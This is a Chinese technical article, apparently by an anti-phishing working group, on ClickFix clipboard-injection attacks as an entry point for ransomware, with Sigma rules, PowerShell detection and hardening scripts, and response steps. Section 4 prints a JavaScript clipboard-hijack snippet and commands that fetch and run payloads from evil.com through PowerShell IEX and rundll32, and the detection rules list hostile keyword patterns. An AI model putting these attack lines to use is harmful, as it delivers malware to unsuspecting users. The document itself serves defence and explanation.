摘要
自 2026 年 3 月起,以 ClickFix 为入口的勒索软件攻击在美洲地区呈现爆发式增长,该技术由 Proofpoint 于 2024 年 6 月首次命名,已从单一社工攻击演变为 IAB、APT 组织与勒索团伙通用的初始访问手段。Halcyon 威胁报告显示,ClickFix 依托伪造系统错误、CAPTCHA 验证、浏览器更新等诱饵页面,通过剪贴板注入恶意命令,诱导用户在 Run 对话框、PowerShell 或终端手动执行,结合 LOLBins 无文件执行、内存载荷注入、C2 隐匿通信等技术,可绕过传统终端防护与边界安全设备,快速完成从初始接入到数据窃取、横向移动直至文件加密的全链路攻击,已成为 Qilin、Termite、Interlock、LeakNet 等勒索家族的核心入口。本文以 Halcyon 公开的勒索攻击杀伤链为实证基础,系统拆解 ClickFix 从剪贴板注入到数据加密的全流程技术机理,剖析其社工诱导、无文件执行、权限规避、C2 隐匿的核心优势,结合 Windows 与 macOS 双平台给出可落地的检测规则、防御配置与应急脚本,构建覆盖终端管控、行为检测、网络拦截、意识培训、应急响应的闭环防御体系,为抵御 ClickFix 驱动的勒索攻击提供理论支撑与工程化方案。
关键词:ClickFix;勒索软件;剪贴板攻击;无文件执行;LOLBins;终端安全
1 引言
随着终端防护与边界安全能力持续增强,传统钓鱼邮件、漏洞利用、恶意附件等攻击路径的成功率显著下降,威胁组织逐步转向社会工程 + 合法工具滥用的混合攻击模式。ClickFix 作为 2024 年以来崛起的典型社工攻击技术,以极低的成本、极高的隐蔽性与极强的通用性,快速成为初始访问中间商(IAB)、APT 组织与勒索软件团伙的首选入口。
Halcyon 勒索软件运营中心监测数据显示,2026 年 3—4 月,ClickFix 活动在美洲地区激增,相关预警成功拦截 Qilin、Termite、Interlock、LeakNet 等多起勒索部署事件,且在多数场景下可绕过除 Halcyon 外的其他安全方案,暴露了传统防御体系对 “用户主动执行恶意命令” 类攻击的检测盲区。ClickFix 的核心威胁在于:将攻击执行权转移给用户自身,依托系统自带工具实现无文件落地,通过伪造高可信界面突破心理防线,形成 “剪贴板→命令执行→远程控制→凭证窃取→横向移动→数据加密” 的完整杀伤链。
当前安全研究多聚焦 ClickFix 的单一攻击环节,对其与勒索软件结合的全链路机理、跨平台实现、防御失效根源与闭环防御体系的系统性研究不足。反网络钓鱼技术专家芦笛指出,ClickFix 代表了下一代社会工程攻击的演进方向 ——从诱导点击转向诱导执行,从文件恶意转向行为恶意,从边界突破转向内部自爆,防御必须从特征匹配升级为行为基线 + 上下文关联 + 权限约束的多维联动模式。
本文以 Halcyon《从剪贴板到加密:ClickFix 在勒索攻击中的关键作用》报告为核心素材,结合真实攻击案例与技术细节,开展全维度机理剖析、检测规则开发、防御配置实现与应急体系构建,为机构抵御 ClickFix 驱动的高级勒索攻击提供可落地、可验证、可复用的解决方案。
2 ClickFix 攻击基础理论与技术背景
2.1 概念定义与发展历程
ClickFix 是一种剪贴板注入 + 社工诱导 + 系统工具滥用的混合攻击技术,通过伪造高可信页面诱导用户将剪贴板中的恶意命令粘贴至 Run 对话框、PowerShell 或终端并手动执行,实现无文件、无接触、高隐蔽的初始访问。
发展历程:
2024 年 6 月:Proofpoint 首次命名并披露,以伪造错误提示为核心诱饵;
2024 年下半年:使用率暴涨 500%,成为仅次于钓鱼邮件的第二大攻击向量;
2025 年:被 Kimsuky、MuddyWater、APT28 等 APT 组织采纳,载荷扩展至窃密木马、RAT;
2026 年 Q1:与勒索软件深度耦合,成为 Qilin、Termite、Interlock、LeakNet 的标准入口,自动化程度提升至无需手动粘贴,通过 rundll32.exe 自动执行。
2.2 核心技术支撑体系
剪贴板注入:页面 JavaScript 静默改写用户剪贴板,替换为恶意命令;
社工诱导:伪造 CAPTCHA、系统错误、浏览器更新、Cloudflare 验证等高可信界面;
LOLBins 滥用:依托 PowerShell、cmd、mshta、curl、rundll32 等系统自带工具执行;
无文件执行:载荷直接注入内存,不落地文件,规避传统 AV 检测;
C2 隐匿:基于 Cloudflare Workers、区块链智能合约、社交平台死信队列实现通信隐匿。
2.3 攻击效能与威胁定位
ClickFix 具备三高一低核心优势:
隐蔽性高:用户主动执行,无恶意进程特征,无文件落地;
通用性高:适配 Windows、macOS,可投递窃密、RAT、勒索等全类型载荷;
成功率高:依托信任伪装与人性弱点,非技术人群命中率极高;
成本极低:无需 0day 漏洞,无需定制恶意代码,可批量规模化部署。
反网络钓鱼技术专家芦笛强调,ClickFix 的本质是把受害者变成攻击执行者,传统防御体系的 “阻止恶意代码运行” 逻辑完全失效,必须从 “控代码” 转向 “控行为、控权限、控上下文”。
2.4 与勒索软件的耦合逻辑
ClickFix 为勒索攻击提供最优初始入口:
快速获取终端控制权,缩短攻击周期;
无文件落地,降低提前暴露风险;
可批量获取大量节点,提升勒索收益;
天然适配双勒索模式(数据窃取 + 文件加密)。
Halcyon 实战数据证实,ClickFix 已成为当前勒索软件杀伤链中最关键的入口节点。
3 ClickFix 驱动的勒索软件全攻击链拆解
3.1 攻击总体流程(Halcyon 勒索杀伤链)
ClickFix 驱动的勒索攻击遵循标准化 8 阶段闭环:
初始访问→远程接入→环境侦察→凭证窃取→横向移动→安全规避→数据窃取→数据加密
3.2 初始访问:剪贴板注入与命令执行
攻击入口:恶意广告、SEO 投毒、钓鱼邮件、被入侵站点跳转。
核心诱导场景:
伪造 Cloudflare DDoS 保护验证;
虚假浏览器 / Office 更新提示;
假 CAPTCHA “人类验证”;
系统错误弹窗 “一键修复”。
技术实现:
页面 JavaScript 通过document.execCommand("copy")静默注入恶意命令到剪贴板;
诱导用户按 Win+R 打开 Run,粘贴并执行;
2026 年新变种:通过 rundll32.exe 自动执行,取消手动粘贴步骤,攻击完全静默。
典型恶意命令示例:
powershell
powershell -ExecutionPolicy Bypass -NoP -NonI -W Hidden -EncodedCommand ZQBuAGMA...
该命令会绕过执行策略、隐藏窗口、解码并执行内存载荷。
3.3 远程接入:RAT 部署与 C2 隐匿
载荷投递后,攻击者部署以下 RAT 实现持久控制:
MIMICRAT/AstarionRAT、CastleRAT、QuasarRAT、NetSupport RAT。
C2 通信隐匿技术:
基于 Cloudflare Workers/CDN 转发流量,伪装正常 HTTPS 请求;
EtherHiding 技术:C2 配置与载荷地址存入币安智能链智能合约;
Steam 社区主页作为死信解析器,获取 C2 地址;
加密信道传输,规避流量检测与内容解析。
3.4 环境侦察:系统信息与安全状态收集
依托 LOLBins 实现无痕迹侦察:
reg.exe 枚举安全软件、提取 MachineGuid;
findstr.exe 检索敏感配置;
采集硬件配置,优化挖矿 / 勒索行为,避免触发告警。
侦察目标:
已安装安全产品列表;
系统权限、域身份、网络拓扑;
敏感数据位置、备份状态。
3.5 凭证窃取:全域凭据捕获
部署多级窃密组件:
窃密木马:Lumma Stealer、Vidar、StealC、AMOS(macOS);
Cobalt Strike Beacon:手动凭证获取、内存抓取;
加载器:Matanbuchus 3.0、DonutLoader、Latrodectus。
窃取范围:
浏览器密码、Cookie、会话令牌;
邮件、云办公、VPN、SSH 凭据;
域管账号、本地管理员 Hash。
3.6 横向移动:内网全域渗透
以沦陷节点为跳板,实现内网全覆盖:
Cobalt Strike Beacon 持久化驻留;
凭据传递、Pass-the-Hash、Pass-the-Ticket;
共享遍历、SMB 爆破、WinRM 远程执行;
批量控制服务器、终端、核心业务系统。
3.7 安全规避:无痕迹突破防护
ClickFix 攻击全流程规避检测:
滥用 LOLBins:curl、mshta、finger、reg、findstr 等伪装正常运维;
内存注入:基于 Deno runtime 直接加载载荷,无磁盘痕迹;
对抗检测:补丁 ETW、禁用 AMSI,盲杀 EDR;
剪贴板注入:绕过浏览器沙箱与下载保护。
3.8 数据窃取与加密:双勒索闭环
数据窃取:加密信道外泄数据,用于二次勒索;
文件加密:使用 MachineGuid 绑定加密密钥,单设备单密钥,无攻击者合作无法解密;
勒索提示:部署勒索信,威胁数据泄露 + 文件永久丢失。
涉及勒索家族:Qilin、Termite(Velvet Tempest)、LeakNet、Interlock。
3.9 攻击链路技术总结
ClickFix 实现了从剪贴板到加密的零断点、高隐蔽、高效率勒索闭环:
社工诱导→剪贴板注入→命令执行→RAT 控制→凭证窃取→横向渗透→安全规避→数据窃取→文件加密。
全程无恶意文件、无高危漏洞、无异常进程,传统防御完全失效。
4 ClickFix 攻击核心技术机理深度分析
4.1 剪贴板注入与社工诱导机理
4.1.1 前端剪贴板劫持技术
恶意页面通过 JavaScript 实现静默复制:
// 剪贴板注入核心代码
function maliciousCopy() {
let cmd = "powershell -ExecutionPolicy Bypass -NoP -W Hidden -C Invoke-WebRequest http://evil.com/payload.ps1 | IEX";
navigator.clipboard.writeText(cmd);
alert("验证代码已复制,请按Win+R粘贴执行以完成验证");
}
// 绑定点击/焦点事件自动触发
document.getElementById("fake_captcha").addEventListener("click", maliciousCopy);
用户点击假验证码时,恶意命令覆盖剪贴板。
4.1.2 社工诱导心理学机制
权威信任:伪装 Cloudflare、Microsoft、Google 等高可信品牌;
紧迫感:“浏览器崩溃”“账号锁定”“DDoS 攻击中”;
简单指令:“复制→粘贴→回车” 三步,降低执行门槛;
技术伪装:命令添加注释REM I am not a robot,伪装验证逻辑。
4.2 无文件执行与 LOLBins 滥用机理
4.2.1 无文件执行核心逻辑
ClickFix 不落地文件,全程内存执行:
命令直接下载并执行载荷;
使用 rundll32、regsvr32、mshta 加载内存 DLL;
Deno runtime 执行 JavaScript 载荷,无磁盘痕迹。
4.2.2 LOLBins 攻击链示例
cmd
rundll32.exe http://evil.com/payload.dll,EntryPoint
该命令通过系统自带工具加载远程恶意 DLL,传统 AV 无告警。
4.3 权限规避与终端对抗机理
用户主动执行:绕过 UAC、应用白名单、行为拦截规则;
AMSI 禁用:载荷执行前关闭 AMSI,规避脚本检测;
ETW 补丁:清除事件跟踪日志,降低溯源能力;
隐蔽窗口:使用 - W Hidden、-NonI 参数隐藏 PowerShell 窗口。
4.4 C2 通信隐匿机理
CDN 中转:Cloudflare Workers 封装 C2 流量,伪装正常 HTTPS;
区块链存储:C2 地址存入智能合约,难以溯源关停;
死信队列:Steam、GitHub 等公共平台作为地址解析节点;
加密传输:TLS + 自定义加密,规避流量特征识别。
4.5 跨平台实现机理
4.5.1 Windows 平台
Run 对话框、PowerShell、cmd、rundll32、mshta 为核心载体。
4.5.2 macOS 平台
诱导打开 Spotlight,粘贴恶意命令;
滥用applescript:// URL Scheme 自动打开脚本编辑器;
执行 curl 下载 AppleScript 载荷,窃取钥匙串凭据;
绕过 macOS 26.4 终端粘贴扫描保护。
4.6 防御失效根源总结
特征检测失效:无恶意文件、无恶意哈希、无恶意域名;
权限逻辑失效:用户主动执行,防护工具视为合法操作;
上下文缺失:单一维度无法判断命令是否为攻击者诱导;
意识短板:用户对 “复制粘贴执行命令” 的风险认知不足。
5 ClickFix 攻击检测方法与代码实现
5.1 进程行为检测规则(Sigma)
yaml
title: ClickFix异常Run对话框执行
status: 实验性
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage: "explorer.exe"
Image|endswith:
- "\powershell.exe"
- "\cmd.exe"
- "\mshta.exe"
- "\rundll32.exe"
CommandLine|contains:
- "ExecutionPolicy Bypass"
- "-NoP"
- "-NonI"
- "-W Hidden"
- "Invoke-WebRequest"
- "IEX"
- "EncodedCommand"
condition: selection
falsepositives:
- 授权运维脚本
level: 高危
tags:
- ClickFix
- 初始访问
- 无文件执行
5.2 剪贴板异常注入检测(PowerShell)
powershell
# 监控剪贴板敏感命令
Register-ObjectEvent -InputObject ([Windows.ApplicationModel.DataTransfer.Clipboard])
-EventName ContentChanged
-Action {
$text = Get-Clipboard
if ($text -match "powershell.*Bypass|IEX|Invoke-WebRequest|rundll32|mshta") {
Write-Host "风险:剪贴板检测到ClickFix类命令" -ForegroundColor Red
Write-Host $text
# 可触发告警/隔离/清空剪贴板
# Set-Clipboard ""
}
}
5.3 Run 对话框历史检测(PowerShell)
powershell
# 检测RunMRU异常命令
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-ErrorAction SilentlyContinue | ForEach-Object {
$props = $_.PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" }
foreach ($p in $props) {
if ($p.Value -match "powershell|cmd|mshta|rundll32.*http|EncodedCommand") {
Write-Host "Run历史发现ClickFix命令:" $p.Value -ForegroundColor Red
}
}
}
5.4 异常 LOLBins 执行检测
yaml
title: 异常LOLBins外联C2
status: 实验性
logsource:
product: windows
category: network_connection
detection:
selection:
Image|endswith:
- "\curl.exe"
- "\mshta.exe"
- "\powershell.exe"
- "\rundll32.exe"
Initiated: true
DestinationIp|isPrivate: false
condition: selection
falsepositives:
- 合法更新/运维
level: 中高危
tags:
- ClickFix
- C2通信
- LOLBins
5.5 macOS 恶意 AppleScript 检测
bash
运行
# 监控applescript://异常调用
log stream --predicate 'process == "Safari" OR process == "Chrome"'
--debug | grep "applescript://"
反网络钓鱼技术专家芦笛指出,ClickFix 检测的核心是抓行为、抓上下文、抓组合,单一命令特征误报高,必须关联进程父系、命令参数、网络外联、剪贴板内容多维判断。
6 ClickFix 攻击防御体系构建
6.1 终端权限管控
6.1.1 限制 Run 与 PowerShell(GPO)
ini
[Computer Configuration\Policies\Administrative Templates\System]
Prevent access to the command prompt = Enabled
Prevent access to the Run dialog = Enabled
[Computer Configuration\Policies\Administrative Templates\Windows Components\Windows PowerShell]
Turn on Script Block Logging = Enabled
Turn on PowerShell Script Block Logging = Enabled
Set the default execution policy = Restricted
6.1.2 应用白名单(AppLocker/WDAC)
禁止普通用户执行 PowerShell、cmd、mshta;
限制 LOLBins 从非信任路径加载远程资源;
仅允许签名脚本与受信厂商程序执行。
6.1.3 macOS 安全配置
MDM 禁用未签名脚本执行;
浏览器拦截applescript:// URL Scheme;
开启终端粘贴恶意命令告警(macOS 26.4+)。
6.2 网络层防御
恶意域名拦截:屏蔽 ClickFix 诱饵页面、C2、新注册域名;
动态 DNS 屏蔽:拦截 FreeDNS、No-IP、TryCloudflare 隧道;
流量监控:检测 LOLBins 异常外联、加密异常流量;
恶意广告拦截:网络层屏蔽恶意广告,阻断入口。
6.3 行为检测与 EDR 优化
开启进程创建、命令行、PowerShell 脚本块日志;
监控 RunMRU、剪贴板敏感内容、异常父进程;
告警内存注入、AMSI 禁用、ETW 补丁行为;
联动 SOAR 实现一键隔离、进程终止、日志回溯。
6.4 安全意识培训
核心培训要点:
任何官方验证 / 更新绝不会要求复制粘贴命令到 Run / 终端;
看到 “验证”“修复”“更新” 诱导执行命令,立即停止并上报;
剪贴板内容粘贴前务必检查,不执行来源不明的代码。
反网络钓鱼技术专家芦笛强调,ClickFix 防御必须技术 + 意识双轮驱动,意识是第一道防线,技术是最后一道防线,缺一不可。
6.5 应急响应流程
断网隔离:立即断开网络,阻止数据泄露与横向移动;
进程终止:结束 PowerShell、cmd、mshta、rundll32 等可疑进程;
日志回溯:检查 RunMRU、进程日志、网络连接、剪贴板历史;
凭证重置:全量修改邮件、云办公、域账号、VPN 密码;
全盘查杀:扫描内存与磁盘,清除 RAT、加载器、持久化项;
全网排查:横向扫描同类入侵,封堵漏洞入口。
6.6 自动化加固脚本(PowerShell)
powershell
# ClickFix防御加固脚本
function Invoke-ClickFixHardening {
# 禁用自动运行
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" -Name "NoDriveTypeAutoRun" -Value 255 -Force
# 限制PowerShell执行策略
Set-ExecutionPolicy Restricted -Force
# 开启脚本块日志
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-PowerShell/Operational" -Name "Enabled" -Value 1 -Force
# 清空敏感剪贴板
Set-Clipboard ""
Write-Host "ClickFix基础加固完成" -ForegroundColor Green
}
Invoke-ClickFixHardening
7 结论与展望
ClickFix 已从单一社会工程攻击演变为勒索软件杀伤链的核心入口技术,依托剪贴板注入、社工诱导、LOLBins 无文件执行、C2 通信隐匿等组合能力,形成从剪贴板到数据加密的完整闭环,可高效绕过传统终端防护、边界安全与人员意识防线,对政企机构构成实质性威胁。Halcyon 的实战数据证实,ClickFix 在 2026 年 Q1 的爆发式增长,标志着勒索攻击正式进入 **“用户主动执行”** 的高级社工阶段,防御范式必须从 “阻止恶意代码” 转向 “约束异常行为、最小权限、上下文感知”。
本文系统拆解 ClickFix 驱动的勒索攻击全流程技术机理,提炼出剪贴板劫持、命令执行、无文件落地、权限规避、横向渗透、数据加密等关键环节的技术特征,构建了覆盖终端管控、网络拦截、行为检测、意识培训、应急响应的闭环防御体系,并提供可直接落地的 Sigma 规则、PowerShell 脚本、GPO 配置与 macOS 防护方案,形成理论 — 技术 — 检测 — 防御 — 响应的完整论证闭环。
反网络钓鱼技术专家芦笛强调,ClickFix 的演进揭示了未来威胁的核心趋势:攻击越来越依赖人性弱点与合法工具,防御越来越依赖行为基线与最小权限。机构必须放弃对特征库、黑名单、静态规则的过度依赖,加快构建以零信任、应用白名单、行为分析、实战化意识培训为核心的主动防御体系。
未来研究将聚焦 ClickFix 自动化变种检测、跨平台统一防御策略、AI 驱动的社工诱导识别、零信任环境下的命令执行管控等方向,持续提升对高级剪贴板攻击与勒索软件的预警、阻断、溯源能力,为数字基础设施安全提供更坚实的理论支撑与工程化方案。
编辑:芦笛(公共互联网反网络钓鱼工作组)
